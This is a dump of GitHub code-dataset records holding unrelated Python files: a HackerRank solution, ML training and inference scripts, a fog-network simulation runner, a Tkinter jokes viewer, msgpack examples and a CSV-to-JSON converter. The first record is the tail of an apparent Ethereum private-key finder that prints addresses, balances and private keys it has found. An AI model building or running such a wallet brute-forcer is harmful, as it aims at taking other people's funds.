Address : {address}, Balance: {balance}, Private Key: {private_key_hex}\")\n\n if count % 10 == 0:\n timestamp = time.strftime('%Y-%m-%d %H:%M:%S')\n print(f\"{count} addresses checked at {timestamp}\")\n\n # Stop if 'esc' key is pressed\n # if keyboard.is_pressed(''):\n # timestamp = time.strftime('%Y-%m-%d %H:%M:%S')\n # print(f\"Stopping at {timestamp}, after checking {count} addresses.\")\n # break\n\n time.sleep(0.01) # Small delay to not overwhelm the CPU\nexcept KeyboardInterrupt:\n # Handle any manual interruption (Ctrl+C)\n print(\"\\nProgram has been stopped manually.\")\n","repo_name":"skg4463/Ethereum_privateKey_finder","sub_path":"finder.py","file_name":"finder.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3630662010","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the substrings function below.\ndef substrings(n):\n count = 0\n pre_digit = 0\n for i in range(len(n)):\n pre_digit = (pre_digit * 10 + int(n[i]) * (i + 1))%(10**9 + 7)\n count = (count + pre_digit)%(10**9 + 7)\n\n return int(count)\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = input()\n\n result = substrings(n)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"encgoo/hackerrank","sub_path":"DynamicProgramming/sam_and_substring.py","file_name":"sam_and_substring.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38793118058","text":"# coding: utf-8\nimport ui\n\nmain = ui.load_view('Views/main')\nend = ui.load_view('Views/game_over')\nstart = ui.load_view('Views/menu')\n\nimg = end['view1']['imageview1']\ntext = end['view1']['label1']\nimg.image = ui.Image().named('iob:social_twitter_outline_256')\nwords =5\nminutes='00:00'\ntext.text = 'I wrote {} words in {} minutes - and then I died using the Not as Dangerous Writing App @TutorialDoctor'.format(words,minutes)\n\nstart.present(hide_title_bar= True)\nmain.present(hide_title_bar = True)\nend.present(hide_title_bar=True)","repo_name":"LokiPlush1/Loki","sub_path":"Projects/UI/Not So Dangerous Writing App/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42832336065","text":"from pathlib import Path\n\nfrom nxontology import NXOntology\nfrom nxontology.node import NodeT\n\nROOT_DIR: Path = Path(__file__).parent.parent\n\n# Will require override on Windows\nCACHE_DIR = Path(\"/tmp/nxontology-ml/cache\")\n\n\ndef get_output_directory(nxo: NXOntology[NodeT], parent_dir: Path = ROOT_DIR) -> Path:\n \"\"\"Get output directory for an nxontology, using the ontology name for the directory.\"\"\"\n assert nxo.name is not None\n directory = parent_dir.joinpath(\"output\", nxo.name)\n directory.mkdir(parents=True, exist_ok=True)\n return directory\n","repo_name":"related-sciences/nxontology-ml","sub_path":"nxontology_ml/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"70118516325","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport numpy as np\nimport csv\n\ntorch.manual_seed(0)\n\n\nclass MyDataLoader:\n def __init__(self, *file_paths):\n self.file_paths = file_paths\n 
self.data = []\n\n def load_data(self):\n for file_path in self.file_paths:\n with open(file_path, 'r') as file:\n data = list(csv.reader(file))\n self.data.append(np.array(data, float))\n return [torch.from_numpy(data.T).to(torch.float32) for data in self.data]\n\n\nclass MyModel(nn.Module):\n def __init__(self):\n super(MyModel, self).__init__()\n self.fc1 = nn.Linear(420, 200)\n self.fc2 = nn.Linear(200, 100)\n self.fc3 = nn.Linear(100, 10)\n\n def forward(self, x):\n x = torch.relu(self.fc1(x))\n x = torch.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n\n\nclass MyTrainer:\n def __init__(self, model, input_data, input_data2, test_data, num_epochs=6000, learning_rate=0.001, patience=10):\n self.model = model\n self.input_data = input_data\n self.input_data2 = input_data2\n self.test_data = test_data\n self.num_epochs = num_epochs\n self.patience = patience\n self.criterion = nn.MSELoss()\n self.optimizer = optim.Adam(model.parameters(), lr=learning_rate)\n self.best_loss = np.inf\n self.early_stopping_counter = 0\n self.current_loss = None\n\n def train(self):\n for epoch in range(self.num_epochs):\n output_data = self.model(self.input_data)\n loss = self.criterion(output_data, self.input_data2)\n self.current_loss = loss.item()\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n if self.current_loss < self.best_loss:\n self.best_loss = self.current_loss\n self.early_stopping_counter = 0\n else:\n self.early_stopping_counter += 1\n\n if self.early_stopping_counter >= self.patience:\n print(f\"Early stopping at epoch {epoch + 1}\")\n break\n\n print(f\"Epoch [{epoch + 1}/{self.num_epochs}], Loss: {self.current_loss}\")\n\n def test(self):\n self.model.eval()\n with torch.no_grad():\n output_data = self.model(self.test_data)\n return output_data\n\n\nif __name__ == \"__main__\":\n file_paths = [\"Prb_data/Prb02data01.csv\", \"Prb_data/Prb02data02.csv\", \"Prb_data/Prb02data03.csv\"]\n data_loader = MyDataLoader(*file_paths)\n input_data, input_data2, test_data = data_loader.load_data()\n\n model = MyModel()\n trainer = MyTrainer(model, input_data, input_data2, test_data, learning_rate=0.001, patience=20)\n trainer.train()\n print(\"Final Loss:\", trainer.current_loss)\n\n test_output = trainer.test()\n\n print(\"Test Output Size:\", test_output.size())\n print(\"Test Output:\", test_output)","repo_name":"LEE-hyeon0771/DeepLearning_basic","sub_path":"AI's mathmatics/Neuralnet_train_test.py","file_name":"Neuralnet_train_test.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70507173925","text":"from transformers import AutoModelForSequenceClassification, Trainer, AutoTokenizer\nimport torch\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\nfrom datasets import load_dataset\nemotions = load_dataset('csv', data_files={'train': [r\"E:\\Projects\\DSI_Gihan\\propaganda_detection\\ready_for_training.csv\"],\n 'validation': [r\"E:\\Projects\\DSI_Gihan\\propaganda_detection\\ready_for_dev.csv\"],\n 'test':[r\"E:\\Projects\\DSI_Gihan\\propaganda_detection\\ready_for_test.csv\"]})\n\n\nmodel_name = \"E:\\Projects\\DSI_Gihan\\propaganda_detection\\propaganda_model\"\n\n\nmodel = AutoModelForSequenceClassification.from_pretrained(model_name)\ntokenizer = AutoTokenizer.from_pretrained(model_name)\n\ndef tokenize(batch):\n return tokenizer(batch[\"text\"], padding=True, truncation=True)\n\nemotions_encoded = emotions.map(tokenize, batched=True, 
batch_size=None)\n\n\n\nemotions_encoded.set_format(\"torch\", columns=[\"input_ids\", \"attention_mask\", \"label\"])\n\n\ntrainer = Trainer(model=model)\ntrainer.model = model.cuda()\ny = trainer.predict(emotions_encoded[\"test\"])\n\n\n\nlabel_dict = {\n 'Black-and-white Fallacy/Dictatorship':0,\n 'Slogans':1,\n 'Name calling/Labeling':2,\n 'Loaded Language':3,\n 'Smears':4,\n 'Causal Oversimplification':5,\n 'Exaggeration/Minimisation':6,\n 'Appeal to fear/prejudice':7,\n 'Reductio ad hitlerum':8,\n 'Repetition':9,\n 'Glittering generalities (Virtue)':10,\n \"Misrepresentation of Someone's Position (Straw Man)\":11,\n 'Doubt':12,\n 'Obfuscation, Intentional vagueness, Confusion':13,\n 'Whataboutism':14,\n 'Flag-waving':15,\n 'Thought-terminating cliché':16,\n 'Presenting Irrelevant Data (Red Herring)':17,\n 'Appeal to authority':18,\n 'Bandwagon':19}\n\nlabels = y.label_ids\n\nfor lbl in labels:\n keys = [k for k, v in label_dict.items() if v == lbl]\n print(keys)\n# print(y.label_ids)","repo_name":"GihanMora/Extreme_LexiBERTa","sub_path":"propaganda_detection/predict_using_finetuned_model.py","file_name":"predict_using_finetuned_model.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"40986727071","text":"import importlib\nimport simpy\nimport functools\nimport random\nimport time\nfrom enum import Enum\nimport numpy\nfrom scipy.stats import norm\nimport scipy as sp\nimport scipy.stats\nimport matplotlib.pyplot as plt\nimport copy\nimport simulator as sim\nimport graph as g\n\n#auxiliar list that keeps the plot markers and colors\nmarkers = ['o', 'v', '^', '<', '>', 's', 'p', 'h', 'H', '+', '<','>']\ncolors = ['b','g','r','c','m', 'y', 'k', 'r', 'b', 'g', 'r', 'c']\n\n#reset markers and colors\ndef resetMarkers():\n\tglobal markers, colors\n\tmarkers = ['o', 'v', '^', '<', '>', 's', 'p', 'h', 'H', '+', '<','>']\n\tcolors = ['b','g','r','c','m', 'y', 'k', 'r', 'b', 'g', 'r', 'c']\n\n#get the blocking probability from the blocked packets and the total generated packets\ndef calcBlocking(blocked, generated):\n\tblocking_probability = []\n\t#iterate over the collection of values in both lists\n\tfor i in range(len(generated)):\n\t\tblock_list = blocked[i]\n\t\tgen_list = generated[i]\n\t\t#now, iterate over the lists and calculates the blocking probability\n\t\tfor j in range(len(gen_list)):\n\t\t\tif gen_list[j] == 0:\n\t\t\t\tblocking_probability.append(0.0)\n\t\t\telse:\n\t\t\t\tblocking_probability.append(block_list[j]/gen_list[j])\n\treturn blocking_probability\n\n\n#Logging\n#generate logs\ndef genLogs(removeHeuristic):\n\t#iterate over each scheduling policy\n\tfor i in sched_pol:\n\t\t#power consumption\n\t\twith open('/home/tinini/Área de Trabalho/ons/elsevier/power/power_consumption_{}_{}_{}_{}_{}.txt'.format(i,removeHeuristic, g.rrhs_amount, len(g.available_vpons), g.cpri_line),'a') as filehandle: \n\t\t filehandle.write(\"{}\\n\\n\".format(i))\n\t\t filehandle.writelines(\"%s\\n\" % p for p in total_power_mean[\"{}\".format(i)])\n\t\t filehandle.write(\"\\n\")\n\t\t filehandle.write(\"\\n\")\n\t\t#blocked\n\t\twith open('/home/tinini/Área de Trabalho/ons/elsevier/blocked/blocked_{}_{}_{}_{}_{}.txt'.format(i,removeHeuristic, g.rrhs_amount, len(g.available_vpons), g.cpri_line),'a') as filehandle: \n\t\t filehandle.write(\"{}\\n\\n\".format(i))\n\t\t filehandle.writelines(\"%s\\n\" % p for p in total_blocking_mean[\"{}\".format(i)])\n\t\t filehandle.write(\"\\n\")\n\t\t 
filehandle.write(\"\\n\")\n\t #blocking probability\n\t\twith open('/home/tinini/Área de Trabalho/ons/elsevier/blocking/blocking_probability_{}_{}_{}_{}_{}.txt'.format(i,removeHeuristic, g.rrhs_amount, len(g.available_vpons), g.cpri_line),'a') as filehandle: \n\t\t filehandle.write(\"{}\\n\\n\".format(i))\n\t\t filehandle.writelines(\"%s\\n\" % p for p in total_blocking_prob_mean[\"{}\".format(i)])\n\t\t filehandle.write(\"\\n\")\n\t\t filehandle.write(\"\\n\")\n\t\t#execution times\n\t\twith open('/home/tinini/Área de Trabalho/ons/elsevier/exec/exec_times_{}_{}_{}_{}_{}.txt'.format(i,removeHeuristic, g.rrhs_amount, len(g.available_vpons), g.cpri_line),'a') as filehandle: \n\t\t filehandle.write(\"{}\\n\\n\".format(i))\n\t\t filehandle.writelines(\"%s\\n\" % p for p in total_exec_time_mean[\"{}\".format(i)])\n\t\t filehandle.write(\"\\n\")\n\t\t filehandle.write(\"\\n\")\n\t\t#average delay\n\t\twith open('/home/tinini/Área de Trabalho/ons/elsevier/delay/avg_delay_{}_{}_{}_{}_{}.txt'.format(i,removeHeuristic, g.rrhs_amount, len(g.available_vpons), g.cpri_line),'a') as filehandle: \n\t\t filehandle.write(\"{}\\n\\n\".format(i))\n\t\t filehandle.writelines(\"%s\\n\" % p for p in total_delay_mean[\"{}\".format(i)])\n\t\t filehandle.write(\"\\n\")\n\t\t filehandle.write(\"\\n\")\n\t\t#lambda usage\n\t\twith open('/home/tinini/Área de Trabalho/ons/elsevier/lambda/lambda_usage_{}_{}_{}_{}_{}.txt'.format(i,removeHeuristic, g.rrhs_amount, len(g.available_vpons), g.cpri_line),'a') as filehandle: \n\t\t filehandle.write(\"{}\\n\\n\".format(i))\n\t\t filehandle.writelines(\"%s\\n\" % p for p in total_lambda_usage_mean[\"{}\".format(i)])\n\t\t filehandle.write(\"\\n\")\n\t\t filehandle.write(\"\\n\")\n\n\t\t#confidence interval\n\t\twith open('/home/tinini/Área de Trabalho/ons/elsevier/confidence/power_{}_{}_{}_{}_{}.txt'.format(i,removeHeuristic, g.rrhs_amount, len(g.available_vpons), g.cpri_line),'a') as filehandle: \n\t\t filehandle.write(\"{}\\n\\n\".format(i))\n\t\t filehandle.writelines(\"%s\\n\" % p for p in power_ci[\"{}\".format(i)])\n\t\t filehandle.write(\"\\n\")\n\t\t filehandle.write(\"\\n\")\n\t\twith open('/home/tinini/Área de Trabalho/ons/elsevier/confidence/blocking_{}_{}_{}_{}_{}.txt'.format(i,removeHeuristic, g.rrhs_amount, len(g.available_vpons), g.cpri_line),'a') as filehandle: \n\t\t filehandle.write(\"{}\\n\\n\".format(i))\n\t\t filehandle.writelines(\"%s\\n\" % p for p in blocking_ci[\"{}\".format(i)])\n\t\t filehandle.write(\"\\n\")\n\t\t filehandle.write(\"\\n\")\n\t\twith open('/home/tinini/Área de Trabalho/ons/elsevier/confidence/exec_{}_{}_{}_{}_{}.txt'.format(i,removeHeuristic, g.rrhs_amount, len(g.available_vpons), g.cpri_line),'a') as filehandle: \n\t\t filehandle.write(\"{}\\n\\n\".format(i))\n\t\t filehandle.writelines(\"%s\\n\" % p for p in exec_ci[\"{}\".format(i)])\n\t\t filehandle.write(\"\\n\")\n\t\t filehandle.write(\"\\n\")\n\t\twith open('/home/tinini/Área de Trabalho/ons/elsevier/confidence/delay_{}_{}_{}_{}_{}.txt'.format(i,removeHeuristic, g.rrhs_amount, len(g.available_vpons), g.cpri_line),'a') as filehandle: \n\t\t filehandle.write(\"{}\\n\\n\".format(i))\n\t\t filehandle.writelines(\"%s\\n\" % p for p in delay_ci[\"{}\".format(i)])\n\t\t filehandle.write(\"\\n\")\n\t\t filehandle.write(\"\\n\")\n\t\twith open('/home/tinini/Área de Trabalho/ons/elsevier/confidence/lambda_usage_{}_{}_{}_{}_{}.txt'.format(i,removeHeuristic, g.rrhs_amount, len(g.available_vpons), g.cpri_line),'a') as filehandle: \n\t\t filehandle.write(\"{}\\n\\n\".format(i))\n\t\t 
filehandle.writelines(\"%s\\n\" % p for p in lambda_usage_ci[\"{}\".format(i)])\n\t\t filehandle.write(\"\\n\")\n\t\t filehandle.write(\"\\n\")\n\n#number of executions\nexecution_times = 15\n#scheduling policies\nsched_pol = []\nsched_pol.append(\"cloud_first_all_fogs\")\nsched_pol.append(\"fog_first\")\nsched_pol.append(\"most_loaded\")\nsched_pol.append(\"least_loaded\")\n#vpon removing policies\nremove_pol = []\nremove_pol.append(\"fog_first\")\nremove_pol.append(\"cloud_first\")\nremove_pol.append(\"random_remove\")\n\n#create the lists to keep the results from\naverage_power = {}\naverage_blocking = {}\ntotal_reqs = {}\nexec_times = {}\nblocking_prob = {}\navg_delay = {}\navg_lambda_usage = {}\nfor i in sched_pol:\n\taverage_power[\"{}\".format(i)] = []\n\taverage_blocking[\"{}\".format(i)] = []\n\ttotal_reqs[\"{}\".format(i)] = []\n\texec_times[\"{}\".format(i)] = []\n\tblocking_prob[\"{}\".format(i)] = []\n\tavg_delay[\"{}\".format(i)] = []\n\tavg_lambda_usage[\"{}\".format(i)] = []\n\n#resets the lists\ndef resetLists():\n\tglobal average_power, average_blocking, total_reqs, exec_times, avg_delay, avg_lambda_usage\n\t#create the lists to keep the results from\n\taverage_power = {}\n\taverage_blocking = {}\n\ttotal_reqs = {}\n\texec_times = {}\n\tblocking_prob = {}\n\tavg_delay = {}\n\tfor i in sched_pol:\n\t\taverage_power[\"{}\".format(i)] = []\n\t\taverage_blocking[\"{}\".format(i)] = []\n\t\ttotal_reqs[\"{}\".format(i)] = []\n\t\texec_times[\"{}\".format(i)] = []\n\t\tblocking_prob[\"{}\".format(i)] = []\n\t\tavg_delay[\"{}\".format(i)] = []\n\t\tavg_lambda_usage[\"{}\".format(i)] = []\n\n#this function reloads the graph module\ndef reloadGraphModule():\n importlib.reload(g)\n\n#general function to reload modules\ndef reloadModule(aModule):\n importlib.reload(aModule)\n\n\nresetMarkers()\nresetLists()\n\ndef getBlocking(block, reqs):\n\ttotal_blocking = []\n\tfor i in range(len(block)):\n\t\tif block[i] == 0:\n\t\t\ttotal_blocking.append(0)\n\t\telse:\n\t\t\ttotal_blocking.append(block[i]/reqs[i])\n\treturn total_blocking\n\nfor i in sched_pol:\n\tprint(\"Executions of heuristic {}\".format(i))\n\t#begin the experiments\n\tfor j in range(execution_times):\n\t\tprint(\"+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n\t\tprint(\"Execution #{} of heuristic {}\".format(j,i))\n\t\tprint(\"+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n\t\t#simulation environment\n\t\tenv = simpy.Environment()\n\t\t#create the graph\n\t\tgp = g.createGraph()\n\t\t#create the control plane\n\t\tcp = sim.Control_Plane(env, \"Graph\", gp, i, \"fog_first\")\n\t\t#traffic generator\n\t\ttg = sim.Traffic_Generator(env,sim.distribution, None, cp)\n\t\t#create the rrhs\n\t\tcp.createRRHs(g.rrhs_amount,env)\n\t\trandom.shuffle(g.rrhs)\n\t\t#create fog nodes\n\t\tg.addFogNodes(gp, g.fogs)\n\t\t#add RRHs to the graph\n\t\tg.addRRHs(gp, 0, 64, \"0\")\n\t\tg.addRRHs(gp, 64, 128, \"1\")\n\t\tg.addRRHs(gp, 128, 192, \"2\")\n\t\tg.addRRHs(gp, 192, 256, \"3\")\n\t\tg.addRRHs(gp, 256, 320, \"4\")\n\t\tg.addRRHs(gp, 320, 384, \"5\")\n\t\tg.addRRHs(gp, 384, 448, \"6\")\n\t\tg.addRRHs(gp, 448, 512, \"7\")\n\t\tg.addRRHs(gp, 512, 576, \"8\")\n\t\tg.addRRHs(gp, 576, 640, \"9\")\n\t\t#starts the simulation\n\t\tenv.run(until = 
86401)\n\t\taverage_power[\"{}\".format(i)].append(sim.average_power_consumption)\n\t\taverage_blocking[\"{}\".format(i)].append(sim.average_blocking_prob)\n\t\ttotal_reqs[\"{}\".format(i)].append(sim.total_requested)\n\t\texec_times[\"{}\".format(i)].append(sim.average_execution_time)\n\t\tavg_lambda_usage[\"{}\".format(i)].append(sim.avg_lambda_usage)\n\t\t#print(average_blocking)\n\t\t#blocking_prob[\"{}\".format(i)].append(calcBlocking(average_blocking[\"{}\".format(i)], total_reqs[\"{}\".format(i)]))\n\t\tblocking_prob[\"{}\".format(i)].append(getBlocking(sim.average_blocking_prob, sim.total_requested))\n\t\t#print(blocking_prob)\n\t\tavg_delay[\"{}\".format(i)].append(sim.average_delay_time)\n\t\treloadGraphModule()\n\t\treloadModule(sim)\n\n#to calculate the confidence interval\ndef mean_confidence_interval(data, confidence=0.95):\n a = 1.0*numpy.array(data)\n n = len(a)\n m, se = numpy.mean(a), scipy.stats.sem(a)\n h = se * sp.stats.t._ppf((1+confidence)/2., n-1)\n #return m, m-h, m+h\n return h\n\n#calculate the confidence interval\n#lists to keep confidence interval\npower_ci ={}\nblocking_ci ={}\nexec_ci = {}\ndelay_ci = {}\nlambda_usage_ci = {}\n\nfor i in sched_pol:\n\tpower_ci[\"{}\".format(i)] = [mean_confidence_interval(col, confidence = 0.95) for col in zip(*average_power[\"{}\".format(i)])]\n\tblocking_ci[\"{}\".format(i)] = [mean_confidence_interval(col, confidence = 0.95) for col in zip(*blocking_prob[\"{}\".format(i)])]\n\texec_ci[\"{}\".format(i)] = [mean_confidence_interval(col, confidence = 0.95) for col in zip(*exec_times[\"{}\".format(i)])]\n\tdelay_ci[\"{}\".format(i)] = [mean_confidence_interval(col, confidence = 0.95) for col in zip(*avg_delay[\"{}\".format(i)])]\n\tlambda_usage_ci[\"{}\".format(i)] = [mean_confidence_interval(col, confidence = 0.95) for col in zip(*avg_lambda_usage[\"{}\".format(i)])]\n\n#calculate the means from the executions\n#power consumption means\ntotal_power_mean = {}\nfor i in sched_pol:\n\ttotal_power_mean[\"{}\".format(i)] = [float(sum(col))/len(col) for col in zip(*average_power[\"{}\".format(i)])]\n\n#blocking means\ntotal_blocking_mean = {}\nfor i in sched_pol:\n\ttotal_blocking_mean[\"{}\".format(i)] = [float(sum(col))/len(col) for col in zip(*average_blocking[\"{}\".format(i)])]\n\n#execution times means\ntotal_exec_time_mean = {}\nfor i in sched_pol:\n\ttotal_exec_time_mean[\"{}\".format(i)] = [float(sum(col))/len(col) for col in zip(*exec_times[\"{}\".format(i)])]\n\n#blocking probability means\ntotal_blocking_prob_mean = {}\nfor i in sched_pol:\n\ttotal_blocking_prob_mean[\"{}\".format(i)] = [float(sum(col))/len(col) for col in zip(*blocking_prob[\"{}\".format(i)])]\n\n#average delay means\ntotal_delay_mean = {}\nfor i in sched_pol:\n\ttotal_delay_mean[\"{}\".format(i)] = [float(sum(col))/len(col) for col in zip(*avg_delay[\"{}\".format(i)])]\n\n#average lambda usage means\ntotal_lambda_usage_mean = {}\nfor i in sched_pol:\n\ttotal_lambda_usage_mean[\"{}\".format(i)] = [float(sum(col))/len(col) for col in zip(*avg_lambda_usage[\"{}\".format(i)])]\n\n\n\ngenLogs(\"remove_fog_first\")\n\n\n\n\n","repo_name":"BrunoDucatiVazquez/Agro5G","sub_path":"5GPy-master/old/experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":11470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3726711147","text":"from tkinter import *\nfrom random import randint\nfrom jokes_list import *\n#-------------------[ main window ]----------------------------\nroot = 
Tk()\nroot.title(\"Jokes view\")\nroot.resizable(0,0)\ncount = 1\nhindi = \"hjoke\"\nenglish = \"ejoke\"\nflag = english\n#---------------------------[ functions ]------------------------------\n\ndef prev():\n global count\n global flag\n if count==1:\n return 0\n else:\n count-=1\n labKey[\"text\"] = f\"{flag} No.{count}\"\n labvalue[\"text\"] = listt[f\"{flag}{count}\"]\n\n\ndef random_():\n global count\n global flag\n count = randint(1,len(listt)//2)\n labKey[\"text\"] = f\"{flag} No.{count}\"\n labvalue[\"text\"] = listt[f\"{flag}{count}\"]\n\ndef next():\n global flag\n global count\n if count==(len(listt)//2):\n return 0\n else:\n count+=1\n labKey[\"text\"] = f\"{flag} No.{count}\"\n labvalue[\"text\"] = listt[f\"{flag}{count}\"]\n\ndef switch(choice):\n global flag\n flag = choice\n labKey[\"text\"] = f\"Joke No.{count}\"\n labvalue[\"text\"] = listt[f\"{flag}{count}\"]\n\n#---------------------------[ row -1 ]------------------------------\nlab0 = Label(root,width = 6,height = 2)\nlab0.grid(row = 0,column = 0,sticky = \"ewns\")\n\nlabKey = Label(root)\nlabKey.grid(row = 0,column = 1,sticky = \"ewns\",pady =20)\n\nbtnhindi = Button(root,text = \"HINDI\",command = lambda:switch(hindi))\nbtnhindi.grid(row = 0,column = 3,sticky = \"ewns\",pady =20 )\n\nbtnenglish = Button(root,text = \"ENGLISH\",command = lambda:switch(english))\nbtnenglish.grid(row = 0,column = 5,sticky = \"ewns\",pady =20 )\n\nlab0 = Label(root,width = 6)\nlab0.grid(row = 0,column = 6,sticky = \"ewns\")\n#-----------------------------[ row - 2 ]-----------------------------------\n\nlabvalue = Label(root,bd = 2,relief = \"solid\",width = 35,height = 10,text = listt[\"ejoke1\"],font = \"bold 20\")\nlabvalue.grid(row = 1,column = 1,sticky = \"ewns\",columnspan = 5)\n\n#-----------------------------[ row - 2 ]-----------------------------------\nlab0 = Label(root,height = 1)\nlab0.grid(row = 2,column =0,sticky = \"ewns\")\n\nbtnpre = Button(root,text = \"🢘\",command = prev)\nbtnpre.grid(row = 3,column = 1,sticky = \"ewns\")\nbtnrand = Button(root,text = \"RANDOM\",font = \"bold\",command = random_)\nbtnrand.grid(row = 3,column = 3,sticky = \"ewns\")\nbtnnext = Button(root,text = \"🢚\",command = next)\nbtnnext.grid(row = 3,column = 5,sticky = \"ewns\")\n\nlab0 = Label(root,height = 1)\nlab0.grid(row = 4,column =0,sticky = \"ewns\")\n\n\n#---------------------------------------------------------------------\nlabKey[\"text\"] = \"Joke No.1\"\n#-----------------------------[ event loop ]----------------------------------\n\nroot.mainloop()","repo_name":"aadilmughal786/jokes-view-Tkinter","sub_path":"Jokesview.py","file_name":"Jokesview.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14425986996","text":"#!usr/bin/python3\n\"\"\"\nBasic msgpack reading into array or dictionary\n\nSome notes:\n\nWriting msgpack files with c++ or python and reading back in python\nyeilds the same results.\n\nStrings written to file will be read with \"b'\" bytes literal, that need to be converted\nto appropriate output.\n\nNumbers are loaded correctly and do not need to be converted from bytes literal.\n\nOne aspect to note, image data is generally recorded as a string/char array, and will therefore\nbe written as a byte literal; however converting to string may result in problems when using\nthe python built-in UTF-8 decoder due to random character escape keys.\n\"\"\"\n\nimport msgpack\nimport numpy as np\n\n# open msgpack 
file:\nfileName = \"/home/en/git/private/msgpack-examples/cmake-build-debug/test01.mpk.active\"\nf = open(fileName, \"rb\")\n# use max_bin_length=val or max_array_length=val to circumvent internal\n# create unpacker object:\npk = msgpack.Unpacker(f)\n# unpacker is a generator, can call next() on it:\nnext_msg = next(pk)\n# parse each message into data array:\nmsgs = [i for i in pk]\n# close the file\nf.close()\n# process data here...\n\n\n\n# Alternative using with operator\nwith open(fileName, \"rb\") as file:\n pk = msgpack.Unpacker(file)\n msgs = [i for i in pk]\n\n\n# Alternative using with operator\nwith open(fileName, \"rb\") as file:\n pk = msgpack.Unpacker(file)\n for _item in pk:\n # do work on _item\n pass\n\n# Pack some data\n# packing a key-value pair adds 10 Bytes per char\ndata = {}\nfor k in range(10):\n data[\"keasdfadsfa{:d}\".format(k)] = np.random.rand()\n\nkeys = [k for k in data]\ndatar = [data[k] for k in data]\n\n_p = str(msgpack.packb(data))\n\n# Write msgpack file\nwith open('data.msgpack', 'wb') as outfile:\n msgpack.pack(data, outfile)\n msgpack.pack(data, outfile)\n msgpack.pack(data, outfile)\n\nwith open('datar.msgpack', 'wb') as outfile:\n msgpack.pack(keys, outfile)\n msgpack.pack(datar, outfile)\n msgpack.pack(datar, outfile)\n\n# Read msgpack file\nwith open(fileName, 'rb') as data_file:\n unpacker = msgpack.Unpacker(data_file)\n data_loaded = []\n for m in unpacker:\n data_loaded.append(m)\n","repo_name":"evgenyslab/msgpack-examples","sub_path":"python/basic_reader.py","file_name":"basic_reader.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71996204004","text":"# -*- coding: utf-8 -*-\n# csv2json.py\n# 2023-06-01 K.OHWADA\n\nimport csv\nimport json\n\n\nFILE_CSV= 'japan_designated_city_list.csv'\n\nFILE_JSON= 'japan_designated_city_coordinates_list.json'\n\n\nCOMMA = ','\n\nCOMMA_HTML = ','\n\nHYPHEN = '-'\n\nEMPTY = ''\n\nSEMICOLON = ';'\n\nCOLON_COLON = '::'\n\n\ndef restore_comma(data):\n if not data:\n return EMPTY\n str_data = data.strip()\n ret = str_data.replace(COMMA_HTML, COMMA)\n return ret\n#\n\n\ndef restore_hyphen(data):\n if not data:\n return EMPTY\n str_data = data.strip()\n if str_data == HYPHEN:\n return EMPTY\n return str_data\n#\n\n\nd= {}\n\nd['name_en'] = '英語名'\nd['name_city'] = '市名'\nd['name_pref'] = '\t都道府県'\nd['url_flag'] = '市旗'\nd['lat'] = '緯度'\nd['lon'] = '経度'\n\ndic = {}\n\ndic['title'] = 'List of Japan ordinance_designated_city'\n\ndic['title_ja'] = '政令指定都市の一覧 位置情報付き'\n\ndic['reference'] = 'wikipedia : 政令指定都市'\n\ndic['url_reference'] = 'https://ja.wikipedia.org/wiki/%E6%94%BF%E4%BB%A4%E6%8C%87%E5%AE%9A%E9%83%BD%E5%B8%82'\n\ndic['item_name_ja'] = d\n\n\ncities = []\n\n\nwith open(FILE_CSV, 'r') as f2:\n reader2 = csv.reader(f2)\n\n for row in reader2:\n len_row = len(row)\n print('len: ', len_row)\n if len_row < 10:\n continue\n d= {}\n d['name_city'] = row[0].strip()\n d['url_city'] = row[1].strip()\n d['name_pref'] = row[2].strip()\n d['url_pref'] = row[3].strip()\n d['url_flag'] = row[4].strip()\n d['flag_width'] = int( row[5].strip() )\n d['flag_height'] = int( row[6].strip() )\n d['name_en'] = row[7].strip()\n d['lat'] = float( row[8].strip() )\n d['lon'] = float( row[9].strip() )\n print(d)\n cities.append(d)\n#\n\ndic['cities'] = cities\n\nwith open(FILE_JSON, 'wt', encoding='utf-8') as f2:\n json.dump(dic, f2, 
